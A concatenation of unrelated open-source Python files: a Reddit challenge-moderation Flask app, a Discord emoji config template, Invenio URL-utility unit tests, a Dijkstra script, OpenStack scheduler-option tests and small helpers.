def Update(self):
"""
Calling this method immediately repaints the invalidated area of the window and all of its
children recursively (this normally only happens when the flow of control returns to the
event loop).
:note: Notice that this function doesn't invalidate any area of the window so nothing happens
if nothing has been invalidated (i.e. marked as requiring a redraw). Use `Refresh` first if
you want to immediately redraw the window unconditionally.
.. versionadded:: 0.9.5
"""
self._infoFrame.Update()
# ==== wx/lib/agw/pybusyinfo.py | garrettcap/Bulletproof-Backup | gpl-2.0 ====
#This is a cell with a custom comment as marker
x=10
y=11
print(x+y)
# ==== tutorial_files/custom.py | HugoGuillen/nb2py | mit ====
#!/usr/bin/python
# TODO: issues with new oauth2 stuff. Keep using older version of Python for now.
# #!/usr/bin/env python
import subprocess
import praw
import datetime
import pyperclip
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection
reload(sys)
sys.setdefaultencoding('utf8')
# Edit Me!
challengePageSubmissionId = '68lss2'
flaskport = 8891
thisMonthName = "May"
nextMonthName = "June"
readAllCommentsWhichCanBeSlower = False
sorryTooLateToSignUpReplyText = "Sorry, but the late signup grace period for " + thisMonthName + " is over, so you can't officially join this challenge. But feel free to follow along anyway, and comment all you want. And be sure to join us for the " + nextMonthName + " challenge. Signup posts for " + nextMonthName + " will begin during the last week of " + thisMonthName + "."
reinstatedReplyText = "OK, I've reinstated you. You should start showing up on the list again starting tomorrow."
app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}
submission = None
def loginAndReturnRedditSession():
config = ConfigParser()
config.read("../reddit-password-credentials.cfg")
user = config.get("Reddit", "user")
password = config.get("Reddit", "password")
# TODO: password auth is going away, and we will soon need to do oauth.
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
redditSession.login(user, password, disable_warning=True)
# submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
# print [str(x) for x in submissions]
return redditSession
def loginOAuthAndReturnRedditSession():
redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
# TODO: Testing comment of refresh. We authenticate fresh every time, so presumably no need to do o.refresh().
# o.refresh(force=True)
return redditSession
def getSubmissionForRedditSession(redditSession):
submission = redditSession.get_submission(submission_id=challengePageSubmissionId)
if readAllCommentsWhichCanBeSlower:
submission.replace_more_comments(limit=None, threshold=0)
return submission
def getCommentsForSubmission(submission):
return [comment for comment in praw.helpers.flatten_tree(submission.comments) if comment.__class__ == praw.objects.Comment]
def retireCommentHash(commentHash):
with open("retiredcommenthashes.txt", "a") as commentHashFile:
commentHashFile.write(commentHash + '\n')
def retiredCommentHashes():
with open("retiredcommenthashes.txt", "r") as commentHashFile:
# return commentHashFile.readlines()
return commentHashFile.read().splitlines()
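# Dedup scheme used below (sketch): each comment is identified by
# sha1(permalink + body); once a moderator action is taken, the hash is
# appended to retiredcommenthashes.txt so later page loads skip that comment.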
@app.route('/moderatechallenge.html')
def moderatechallenge():
currentDayOfMonthIndex = datetime.date.today().day
lateCheckinGracePeriodIsInEffect = currentDayOfMonthIndex <= 3
global commentHashesAndComments
global submission
commentHashesAndComments = {}
stringio = StringIO()
stringio.write('<html>\n<head>\n</head>\n\n')
# redditSession = loginAndReturnRedditSession()
redditSession = loginOAuthAndReturnRedditSession()
submission = getSubmissionForRedditSession(redditSession)
flat_comments = getCommentsForSubmission(submission)
retiredHashes = retiredCommentHashes()
i = 1
stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
stringio.write("<h3>")
stringio.write(os.getcwd())
stringio.write("<br>\n")
stringio.write(submission.title)
stringio.write("</h3>\n\n")
stringio.write('<form action="copydisplaytoclipboard.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" name="actiontotake" value="Copy display.py stdout to clipboard">')
stringio.write('<input type="submit" name="actiontotake" value="Automatically post display.py stdout">')
stringio.write('</form>')
stringio.write('<form action="updategooglechart.html" method="post" target="invisibleiframe">')
stringio.write('<input type="submit" value="update-google-chart.py">')
stringio.write('</form>')
for comment in flat_comments:
# print comment.is_root
# print comment.score
i += 1
commentHash = sha1()
commentHash.update(comment.permalink)
commentHash.update(comment.body.encode('utf-8'))
commentHash = commentHash.hexdigest()
if commentHash not in retiredHashes:
commentHashesAndComments[commentHash] = comment
authorName = str(comment.author) # can be None if author was deleted. So check for that and skip if it's None.
participant = ParticipantCollection().participantNamed(authorName)
stringio.write("<hr>\n")
stringio.write('<font color="blue"><b>')
stringio.write(authorName)
stringio.write('</b></font><br>')
if ParticipantCollection().hasParticipantNamed(authorName):
stringio.write(' <small><font color="green">(member)</font></small>')
if participant.isStillIn:
stringio.write(' <small><font color="green">(still in)</font></small>')
else:
stringio.write(' <small><font color="red">(out)</font></small>')
if participant.hasCheckedIn:
stringio.write(' <small><font color="green">(checked in)</font></small>')
else:
stringio.write(' <small><font color="orange">(not checked in)</font></small>')
if participant.hasRelapsed:
stringio.write(' <small><font color="red">(relapsed)</font></small>')
else:
stringio.write(' <small><font color="green">(not relapsed)</font></small>')
else:
stringio.write(' <small><font color="red">(not a member)</font></small>')
stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
if lateCheckinGracePeriodIsInEffect:
stringio.write('<input type="submit" name="actiontotake" value="Checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin" style="color:white;background-color:green">')
else:
stringio.write('<input type="submit" name="actiontotake" value="Checkin" style="color:white;background-color:green">')
stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
stringio.write('<input type="submit" name="actiontotake" value="Relapse" style="color:white;background-color:red">')
stringio.write('<input type="submit" name="actiontotake" value="Reinstate with automatic comment">')
stringio.write('<input type="submit" name="actiontotake" value="Reply with sorry-too-late comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
stringio.write('</form>')
stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
stringio.write("\n<br><br>\n\n")
stringio.write('</html>')
pageString = stringio.getvalue()
stringio.close()
return Response(pageString, mimetype='text/html')
@app.route('/takeaction.html', methods=["POST"])
def takeaction():
username = b64decode(request.form["username"])
commentHash = str(request.form["commenthash"])
# commentPermalink = request.form["commentpermalink"]
actionToTake = request.form["actiontotake"]
# print commentHashesAndComments
comment = commentHashesAndComments[commentHash]
# print "comment: " + str(comment)
if actionToTake == 'Checkin':
print "checkin - " + username
subprocess.call(['./checkin.py', username])
comment.upvote()
retireCommentHash(commentHash)
if actionToTake == 'Signup and checkin':
print "signup and checkin - " + username
subprocess.call(['./signup-and-checkin.sh', username])
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Relapse':
print "relapse - " + username
subprocess.call(['./relapse.py', username])
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Reinstate with automatic comment':
print "reinstate - " + username
subprocess.call(['./reinstate.py', username])
comment.reply(reinstatedReplyText)
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Reply with sorry-too-late comment':
print "reply with sorry-too-late comment - " + username
comment.reply(sorryTooLateToSignUpReplyText)
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == 'Skip comment':
print "Skip comment - " + username
comment.upvote()
retireCommentHash(commentHash)
elif actionToTake == "Skip comment and don't upvote":
print "Skip comment and don't upvote - " + username
retireCommentHash(commentHash)
return Response("hello", mimetype='text/html')
@app.route('/copydisplaytoclipboard.html', methods=["POST"])
def copydisplaytoclipboard():
actionToTake = request.form["actiontotake"]
if actionToTake == 'Copy display.py stdout to clipboard':
subprocess.call(['./display.py'])
if actionToTake == 'Automatically post display.py stdout':
subprocess.call(['./display.py'])
submissionText = pyperclip.paste()
submission.edit(submissionText)
return Response("hello", mimetype='text/html')
@app.route('/updategooglechart.html', methods=["POST"])
def updategooglechart():
print "TODO: Copy display to clipboard"
subprocess.call(['./update-google-chart.py'])
return Response("hello", mimetype='text/html')
if __name__ == '__main__':
app.run(host='127.0.0.1', port=flaskport)
# ==== stayclean-2017-may/serve-challenge-with-flask.py | foobarbazblarg/stayclean | mit ====
"""Config file for the emojis that Chiaki will use.
RENAME THIS FILE TO emojis.py OTHERWISE IT WON'T WORK.
By default it uses the unicode emojis. However, you can specify
server emojis in one of the two possible ways:
1. The raw string of the emoji. This is the format <:name:id>. You can find this
by placing a backslash before the emoji.
2. The ID of the emoji. This must be an integer. And can be shown through the
same method.
Note that bots have "nitro" status when it comes to emojis. So as long as
it's in the server that has the custom emoji, the bot can use it on any other
server it's in.
"""
# ------- Confirmation emojis (for Context.ask_confirmation) -------
# Confirm option
confirm = '\N{WHITE HEAVY CHECK MARK}'
# Deny Option
deny = '\N{CROSS MARK}'
# ------- Status emojis (for various info commands) ----------------
online = '\N{GREEN HEART}'
idle = '\N{YELLOW HEART}'
dnd = '\N{HEAVY BLACK HEART}'
offline = '\N{BLACK HEART}'
streaming = '\N{PURPLE HEART}'
bot_tag = '\N{ROBOT FACE}'
# ------- Currency Emoji -------------
money = '\N{BANKNOTE WITH DOLLAR SIGN}'
# ------ Numbers -----
# Right now it uses the default key-caps
# However, you may specify custom emojis if needed
#
# Note: The numbers are what *Discord sees them as*. Technically the
# actual keycap number emoji would be {number}\ufe0f\u20e3. But discord
# instead sends it as {number}\u20e3 (without the \ufe0f). Do not add the
# \fe0f in, otherwise it won't send as an actual number.
numbers = [
f'{n}\u20e3' for n in range(10)
]
# ------- Minesweeper -------
# Not an emoji per se but set to True if you want to be able to use external
# emojis for Minesweeper. This only applies to Minesweeper as this changes
# the control scheme if she's able to use external emojis.
#
# Note that if Chiaki doesn't have Use External Emojis she'll be forced to
# use the default control scheme by default.
msw_use_external_emojis = False
msw_y_row = [
# Should have emojis representing 1-17.
# If you set msw_use_external_emojis to True this *must* be filled.
]
msw_letters = [
# Should have emojis representing A-Q or some equivalent.
# If you set msw_use_external_emojis to True this *must* be filled.
]
# ------ Connect-Four -------
c4_winning_tiles = [
'\N{HEAVY BLACK HEART}',
'\N{BLUE HEART}'
]
# ------- Sudoku ------
sudoku_clues = [
f'{n}\u20e3' for n in range(1, 10) # digits 1-9; range(1, 9) stopped at 8
]
# ------- Checkers -------
checkers_black_king = '\N{HEAVY BLACK HEART}'
checkers_white_king = '\N{BLUE HEART}'
checkers_black_last_move = ''
checkers_white_last_move = ''
# -------- Shards ---------
shard_connecting = ''
shard_online = ''
shard_disconnecting = ''
shard_offline = ''
# ==== emojistemplate.py | Ikusaba-san/Chiaki-Nanami | mit ====
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for the urlutils library."""
__revision__ = "$Id$"
from invenio.testutils import InvenioTestCase
from cgi import parse_qs
from invenio.config import CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite
from invenio.urlutils import (create_AWS_request_url,
string_to_numeric_char_reference,
make_canonical_urlargd,
create_html_link,
create_html_mailto,
same_urls_p,
HASHLIB_IMPORTED,
wash_url_argument,
create_url,
create_Indico_request_url,
get_relative_url)
class TestWashUrlArgument(InvenioTestCase):
def test_wash_url_argument(self):
"""urlutils - washing of URL arguments"""
self.assertEqual(1,
wash_url_argument(['1'], 'int'))
self.assertEqual("1",
wash_url_argument(['1'], 'str'))
self.assertEqual(['1'],
wash_url_argument(['1'], 'list'))
self.assertEqual(0,
wash_url_argument('ellis', 'int'))
self.assertEqual("ellis",
wash_url_argument('ellis', 'str'))
self.assertEqual(["ellis"],
wash_url_argument('ellis', 'list'))
self.assertEqual(0,
wash_url_argument(['ellis'], 'int'))
self.assertEqual("ellis",
wash_url_argument(['ellis'], 'str'))
self.assertEqual(["ellis"],
wash_url_argument(['ellis'], 'list'))
class TestUrls(InvenioTestCase):
"""Tests on URLs"""
def test_url_creation(self):
"""urlutils - test url creation"""
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=True),
'http://www.a.com/search?of=hb%26&recid=3')
self.assertEqual(create_url('http://www.a.com/search',
{'recid':3, 'of':'hb&'},
escape_urlargd=False),
'http://www.a.com/search?of=hb&&recid=3')
def test_canonical_urlargd_creation(self):
"""urlutils - test creation of canonical URLs"""
self.assertEqual(make_canonical_urlargd({'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?&'},
{'a': ('int', 1),
'b': ('str', 2)}),
"?b%26=2%3D&%3A=%3F%26&b=2")
if HASHLIB_IMPORTED:
def test_signed_aws_request_creation(self):
"""urlutils - test creation of signed AWS requests"""
signed_aws_request_url = create_AWS_request_url("http://webservices.amazon.com/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Service': 'AWSECommerceService',
'Operation': 'ItemLookup',
'ItemId': '0679722769',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews',
'Version': '2009-01-06'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Are we at least acccessing correct base url?
self.assert_(signed_aws_request_url.startswith("http://webservices.amazon.com/onca/xml"))
            # Check that parameters with special characters (',' and ':') get
            # correctly encoded/decoded
## Note: using parse_qs() url-decodes the string
self.assertEqual(parse_qs(signed_aws_request_url)["ResponseGroup"],
['ItemAttributes,Offers,Images,Reviews'])
self.assert_('ItemAttributes%2COffers%2CImages%2CReviews' \
in signed_aws_request_url)
self.assertEqual(parse_qs(signed_aws_request_url)["Timestamp"],
['2009-01-01T12:00:00Z'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url)["Signature"],
['Nace+U3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg='])
self.assert_('Nace%2BU3Az4OhN7tISqgs1vdLBHBEijWcBeCqL5xN9xg%3D&Operation' \
in signed_aws_request_url)
            # Continue with an additional request
signed_aws_request_url_2 = \
create_AWS_request_url("http://ecs.amazonaws.co.uk/onca/xml",
{'AWSAccessKeyId': '00000000000000000000',
'Actor': 'Johnny Depp',
'AssociateTag': 'mytag-20',
'Operation': 'ItemSearch',
'ResponseGroup': 'ItemAttributes,Offers,Images,Reviews,Variations',
'SearchIndex': 'DVD',
'Service': 'AWSECommerceService',
'Sort': 'salesrank',
'Version': '2009-01-01'},
"1234567890",
_timestamp="2009-01-01T12:00:00Z")
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_aws_request_url_2)["Signature"],
['TuM6E5L9u/uNqOX09ET03BXVmHLVFfJIna5cxXuHxiU='])
def test_signed_Indico_request_creation(self):
"""urlutils - test creation of signed Indico requests"""
signed_Indico_request_url = create_Indico_request_url("https://indico.cern.ch",
"categ",
"",
[1, 7],
"xml",
{'onlypublic': 'yes',
'order': 'title',
'from': 'today',
'to': 'tomorrow'},
'00000000-0000-0000-0000-000000000000',
'00000000-0000-0000-0000-000000000000',
_timestamp=1234)
            # Are we at least accessing the correct base URL?
self.assert_(signed_Indico_request_url.startswith("https://indico.cern.ch/export/categ/1-7.xml?"))
# Check parameters
self.assertEqual(parse_qs(signed_Indico_request_url)["order"],
['title'])
self.assertEqual(parse_qs(signed_Indico_request_url)["timestamp"],
['1234'])
# Check signature exists and is correct
self.assertEqual(parse_qs(signed_Indico_request_url)["signature"],
['e984e0c683e36ce3544372f23a397fd2400f4954'])
def test_same_urls_p(self):
"""urlutils - test checking URLs equality"""
self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f',
CFG_SITE_URL + '?e=f&c=d&a=b'),
True)
self.assertEqual(same_urls_p(CFG_SITE_URL + '?a=b&c=d&e=f&ln=fr',
CFG_SITE_URL + '?e=f&c=d&a=b&ln=en'),
False)
class TestHtmlLinks(InvenioTestCase):
"""Tests on HTML links"""
def test_html_link_creation(self):
"""urlutils - test creation of HTML links"""
# Check with various encoding and escaping traps
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"}),
'<a href="http://www.a.com?a=1&%3A=%3F&b%26=2%3D&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_html_link_creation_no_argument_escaping(self):
"""urlutils - test creation of HTML links, without arguments escaping"""
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"},
escape_urlargd=False),
'<a href="http://www.a.com?a=1&:=?&b&=2=&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_html_link_creation_no_attribute_escaping(self):
"""urlutils - test creation of HTML links, without attributes escaping"""
self.assertEqual(create_html_link('http://www.a.com',
{'a' : 1,
'b' : '2',
'b&': '2=',
':' : '?'},
'my label > & better than yours',
{'style': 'color:#f00',
'target': "_blank"},
escape_linkattrd=False),
'<a href="http://www.a.com?a=1&%3A=%3F&b%26=2%3D&b=2" style="color:#f00" target="_blank">my label > & better than yours</a>')
def test_string_to_numeric_char_reference(self):
"""urlutils - test numeric character conversion from string"""
        self.assertEqual(string_to_numeric_char_reference('abc123'),
                         "&#97;&#98;&#99;&#49;&#50;&#51;")
        self.assertEqual(string_to_numeric_char_reference('\/&;,#$%~é'),
                         "&#92;&#47;&#38;&#59;&#44;&#35;&#36;&#37;&#126;&#195;&#169;")
class TestEmailObfuscationMode(InvenioTestCase):
"""Tests on HTML mailto links creation and obfuscation modes"""
def test_html_mailto_obfuscation_mode_minus1(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode -1"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=-1),
'')
def test_html_mailto_obfuscation_mode_0(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 0"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=0),
'<a href="mailto:[email protected]?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_1(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 1"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=1),
'<a href="mailto:juliet [at] cds [dot] cern [dot] ch?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_2(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 2"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=2),
'<a href="mailto:juliet@cds.cern.ch?body=Lunch%20at%208pm%3F%0D%0Acu%21&bcc=romeo%40cds.cern.ch&subject=Hey%20there" style="text-decoration: blink">Date creator</a>')
def test_html_mailto_obfuscation_mode_3(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 3"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=3),
'<script language="JavaScript" type="text/javascript">document.write(\'>a/<rotaerc etaD>"knilb :noitaroced-txet"=elyts "ereht02%yeH=tcejbus;pma&hc.nrec.sdc04%oemor=ccb;pma&12%ucA0%D0%F3%mp802%ta02%hcnuL=ydob?hc.nrec.sdc@teiluj:otliam"=ferh a<\'.split("").reverse().join(""))</script>')
def test_html_mailto_obfuscation_mode_4(self):
"""urlutils - test creation of HTML "mailto" links, obfuscation mode 4"""
        self.assertEqual(create_html_mailto('juliet@cds.cern.ch',
subject='Hey there',
body='Lunch at 8pm?\ncu!',
                                            bcc='romeo@cds.cern.ch',
link_label="Date creator",
linkattrd={'style': 'text-decoration: blink'},
email_obfuscation_mode=4),
'juliet<img src="%(CFG_SITE_URL)s/img/at.gif" alt=" [at] " style="vertical-align:baseline" />cds<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />cern<img src="%(CFG_SITE_URL)s/img/dot.gif" alt=" [dot] " style="vertical-align:bottom" />ch' % \
{'CFG_SITE_URL': CFG_SITE_URL})
class TestRelativeURL(InvenioTestCase):
"""Tests the get_relative_url function with different input strings"""
def test_relative_url(self):
"""urlutils - test get_relative_url"""
url_normal = "http://web.net"
self.assertEqual("", get_relative_url(url_normal))
url_normal_trailing = "http://web.net/"
self.assertEqual("", get_relative_url(url_normal_trailing))
url_more = "http://web.net/asd"
self.assertEqual("/asd", get_relative_url(url_more))
url_more_trailing = "http://web.net/asd/"
self.assertEqual("/asd", get_relative_url(url_more_trailing))
url_adv = "http://web.net/asd/qwe"
self.assertEqual("/asd/qwe", get_relative_url(url_adv))
url_adv_trailing = "http://web.net/asd/qwe/"
self.assertEqual("/asd/qwe", get_relative_url(url_adv_trailing))
TEST_SUITE = make_test_suite(TestWashUrlArgument,
TestUrls,
TestHtmlLinks,
TestEmailObfuscationMode,
TestRelativeURL)
if __name__ == "__main__":
run_test_suite(TEST_SUITE)
| jmartinm/invenio | modules/miscutil/lib/urlutils_unit_tests.py | Python | gpl-2.0 | 18,616 | 0.004835 |
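# A minimal sketch of the order-insensitive comparison that test_same_urls_p
# above exercises: two URLs count as equal when scheme, host, path and the
# multiset of query parameters all match, whatever the parameter order. This
# is an illustration only, not Invenio's actual same_urls_p implementation.
from urlparse import urlparse, parse_qs

def urls_equivalent(url1, url2):
    p1, p2 = urlparse(url1), urlparse(url2)
    return ((p1.scheme, p1.netloc, p1.path) == (p2.scheme, p2.netloc, p2.path)
            and parse_qs(p1.query) == parse_qs(p2.query))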
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def dijkstra(a, S):
    """Single-source shortest path distances from S over a.adjLst."""
    N = len(a.adjLst)
    Visited = [False for i in xrange(N)]
    Distance = [float('inf') for i in xrange(N)]
    Distance[S] = 0
    heap = []
    heapq.heappush(heap, (0, S))
    while heap:
        # Pop the closest vertex; entries for already-visited vertices are
        # stale duplicates and are simply skipped. Looping on the heap itself
        # avoids popping from an empty heap when some vertices are unreachable.
        _, u = heapq.heappop(heap)
        if Visited[u]:
            continue
        Visited[u] = True
        for weight_uv, v in a.adjLst[u]:
            if not Visited[v] and Distance[v] > Distance[u] + weight_uv:
                Distance[v] = Distance[u] + weight_uv
                heapq.heappush(heap, (Distance[v], v))
    print Distance
    return Distance
g = weightedGraph(4)
g.addEdge(0, 1, 1)
g.addEdge(1, 2, 2)
g.addEdge(2, 3, 3)
g.addEdge(3, 0, 4)
dijkstra(g, 0)
| ddeepak6992/Algorithms | Graph/Dijkstra.py | Python | gpl-2.0 | 935 | 0.019251 |
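# The `graph` module imported by the script above is not part of this
# listing. A minimal sketch of the weightedGraph interface that dijkstra()
# relies on -- an adjacency list of (weight, neighbour) pairs -- assuming
# undirected edges; a hypothetical reconstruction, not the author's class.
class weightedGraph(object):
    def __init__(self, n):
        self.adjLst = [[] for _ in xrange(n)]

    def addEdge(self, u, v, w):
        # Store both directions so the graph behaves as undirected.
        self.adjLst[u].append((w, v))
        self.adjLst[v].append((w, u))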
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For PickledScheduler.
"""
import datetime
import StringIO
from nova.openstack.common import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
def __init__(self, last_checked, now, file_old, file_now, data, filedata):
super(FakeSchedulerOptions, self).__init__()
# Change internals ...
self.last_modified = file_old
self.last_checked = last_checked
self.data = data
# For overrides ...
self._time_now = now
self._file_now = file_now
self._file_data = filedata
self.file_was_loaded = False
def _get_file_timestamp(self, filename):
return self._file_now
def _get_file_handle(self, filename):
self.file_was_loaded = True
return StringIO.StringIO(self._file_data)
def _get_time_now(self):
return self._time_now
class SchedulerOptionsTestCase(test.NoDBTestCase):
def test_get_configuration_first_time_no_flag(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration())
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_first_time_empty_file(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
jdata = ""
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_first_time_happy_day(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_second_time_no_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_too_fast(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2011, 1, 1, 1, 1, 2)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(old_data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
| Brocade-OpenSource/OpenStack-DNRM-Nova | nova/tests/scheduler/test_scheduler_options.py | Python | apache-2.0 | 5,241 | 0.001145 |
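# The tests above pin down the reload policy of SchedulerOptions: the JSON
# file is consulted only when a filename is given, skipped when the previous
# check happened too recently, and re-read only when the file's mtime is
# newer than the copy already in memory. A condensed sketch of that decision
# (a hypothetical helper -- the real logic lives in
# nova.scheduler.scheduler_options -- with the minimum interval assumed):
import datetime

def should_reload(last_checked, now, last_modified, file_now,
                  min_interval=datetime.timedelta(minutes=5)):
    if last_checked and now - last_checked < min_interval:
        return False  # the "too fast" case: keep serving cached data
    return last_modified is None or file_now > last_modified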
"""
Init
"""
from __future__ import unicode_literals
import datetime
import os
import subprocess
VERSION = (2, 2, 13, 'final', 0)
def get_version(version=None):
"""
Returns a PEP 386-compliant version number from VERSION.
"""
if not version:
version = VERSION
else:
assert len(version) == 5
assert version[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
